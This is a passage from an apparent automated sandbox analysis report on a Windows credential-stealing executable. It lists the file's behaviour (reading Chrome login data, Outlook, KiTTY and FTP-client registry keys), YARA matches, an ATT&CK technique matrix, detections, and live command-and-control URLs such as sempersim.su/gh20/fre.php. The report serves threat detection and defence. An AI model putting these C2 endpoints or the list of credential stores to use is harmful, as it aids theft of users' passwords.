              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: hfyhigXccT.exe PID: 6448, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: hfyhigXccT.exe PID: 6764, type: MEMORYSTR
              Source: C:\Users\user\Desktop\hfyhigXccT.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath Interception11
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              11
              Security Software Discovery
              Remote Services1
              Email Collection
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Disable or Modify Tools
              1
              Credentials in Registry
              1
              Process Discovery
              Remote Desktop Protocol11
              Archive Collected Data
              Exfiltration Over Bluetooth2
              Non-Application Layer Protocol
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
              Virtualization/Sandbox Evasion
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares2
              Data from Local System
              Automated Exfiltration112
              Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
              Process Injection
              NTDS1
              Remote System Discovery
              Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets13
              System Information Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common2
              Obfuscated Files or Information
              Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items12
              Software Packing
              DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              hfyhigXccT.exe100%Joe Sandbox ML
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              5.0.hfyhigXccT.exe.400000.14.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.hfyhigXccT.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.hfyhigXccT.exe.4395410.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.2.hfyhigXccT.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.hfyhigXccT.exe.437b3f0.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.hfyhigXccT.exe.400000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.hfyhigXccT.exe.400000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.hfyhigXccT.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.hfyhigXccT.exe.400000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              SourceDetectionScannerLabelLink
              sempersim.su27%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://www.sajatypeworks.com20%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://sempersim.su/gh20/fre.php22%VirustotalBrowse
              http://sempersim.su/gh20/fre.php100%Avira URL Cloudmalware
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/70%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.fontbureau.comtto90%Avira URL Cloudsafe
              http://www.galapagosdesign.com/9q0%Avira URL Cloudsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/%0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sajatypeworks.come0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.galapagosdesign.com/0%URL Reputationsafe
              http://www.fontbureau.comF0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://www.founder.com.cn/cnscr0%Avira URL Cloudsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/M0%URL Reputationsafe
              http://www.fontbureau.comM0%Avira URL Cloudsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.fontbureau.comrsivb0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/i0%URL Reputationsafe
              http://www.fontbureau.comituo_0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/_0%URL Reputationsafe
              http://en.w=0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              sempersim.su
              104.155.55.2
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://sempersim.su/gh20/fre.phpfalse
              • 22%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.fontbureau.com/designersGhfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.sajatypeworks.com2hfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 